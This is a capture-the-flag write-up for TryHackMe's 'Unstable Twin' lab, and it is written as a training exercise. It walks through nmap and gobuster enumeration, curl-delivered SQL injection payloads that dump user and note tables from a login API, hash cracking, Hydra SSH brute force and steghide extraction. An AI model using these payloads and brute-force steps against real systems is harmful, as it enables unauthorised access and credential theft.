Unstable Twin Write-Up (TryHackMe)

kaarb0
5 min readJun 16, 2021

--

A Services based room, extracting information from HTTP Services and finding the hidden messages. This room was created by trb143.

Twins (1988)

Based on the Twins film, find the hidden keys.

Julius and Vincent have gone into the SERVICES market to try and get the family back together.
They have just deployed a new version of their code, but Vincent has messed up the deployment!

Can you help their mother find and recover the hidden keys and bring the family and girlfriends back together?

Enumeration

The first thing I did was to scan the IP with NMAP to learn more about the host and the technologies it was using.

nmap -sC -sV <IP> -Pn
  • -sC : Equivalent to — script=default
  • -sV : Probe open ports to determine service/version info
  • -Pn : Treat all hosts as online

There are SSH on port 22 and a web server on port 80.

  • SSH on port 22 runs OpenSSH 8.0
  • HTTP on port 80 runs Nginx 1.14.1

After discovering this, I decided to see what the website looked like on port 80.

http://<IP>:80/

Mmmh, I was a little disapointed so I launched Gobuster to do a little more enumeration.

gobuster dir -u http://<IP>/ -w /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt
  • dir : Enumerate directories
  • -u : The URL to enumerate
  • -w : The wordlist to use

As soon as I saw the /info page, I decided to check it out.

http://<IP>:80/info

The login API needs to be called with the username and password form fields fields. It has not been fully tested yet so may not be full developped and secure

After further enumeration, I opened Burpsuite to try to learn more about the API.

Repeater in Burpsuite

With another request…

Repeater in Burpsuite

After multiple requests, it sent me back different build numbers and different server names.

Remember “Vincent has messed up the deployment!” ? At this time, I knew I was in the right way…

I needed to login with the API. So I tried this:

http://<IP>/api/login

Bingo, that’s what I looked for. I used the GET method, but for login forms, it needs to be with POST method so here’s what I did :

Repeater in Burpsuite

The username or password passed are not correct.

SQL Injection

After having tried many times to perform SQL injections via Burpsuite, I then tried with Curl.

curl -X POST -d “username=admin’ OR 1=1 — &password=test” http://<IP>/api/login
  • -X : The method used
  • -d : HTTP POST data

That’s how I was able to discover the users.

After this little victory, I tried to go further…

curl -X POST -d “username=admin’ UNION SELECT username,password FROM users — &password=test” http://<IP>/api/login

I then extracted the tables :

curl -X POST -d “username=admin’ UNION select 1,tbl_name from sqlite_master— -&password=test” http://<IP>/api/login

I saw 3 tables :

  • notes
  • sqlite_sequence
  • users

When I dumped users’s table, it gaves me an error 500 :

curl -X POST -d “username=admin’ UNION select 1,users from users— -&password=test” http://<IP>/api/login

So, I dumped notes :

curl -X POST -d “username=admin’ UNION select 1,notes FROM notes— -&password=test” http://<IP>/api/login

I have left my notes on the server. They will me help get the family back together. My password is **********************************

I used hash-identifier to know the type of hash that was given to me.

hash-identifier

SHA-512

The first thing I did after discovering the hash type was to go and check the online databases. So I went to Crackstation, and so I was able to get the password.

CrackStation

To find out who the password belonged to, I created a list of usernames, with the ones retrieved earlier, and brute-forced the SSH with Hydra.

cat users.txt
hydra -L users.txt -p ****** <IP> ssh -t 4
  • -L : List of usernames
  • -p : The password
  • -t : Number of threads

I was then connected to SSH with mary_ann, and got the user flag.

User Flag

Final Flag

cat server_notes.txt

Now you have found my notes you now you need to put my extended family together. We need to GET their IMAGE for the family album. These can be retrieved by NAME. You need to find all of them and a picture of myself!

As soon as I read this note, I knew it wasn’t going to be a classic elevation of privilege.

I immediately realized that the directory I had found earlier with Gobuster (/get_image) was going to be useful now.

http://<IP>/get_image?name=********

After finding the first image, I decided to look for messages hidden inside, for that I used StegHide.

steghide extract -sf ******.gif
  • -sf : Select stego file & extract data from it
cat ******.txt

You need to find all my children and arrange in a rainbow!

All I had to do was to extract the txt file of the photos of the other people of his family, and to organize the answers according to the colors of the rainbow, that gave me a chain of characters which can easily be deciphered with CyberChief.

cat ****

After deciphering the chain of characters, I got the Final Flag.

PWNED !!!

Thank you for reading this write-up, I hope it helped you.

--

--

kaarb0
kaarb0

No responses yet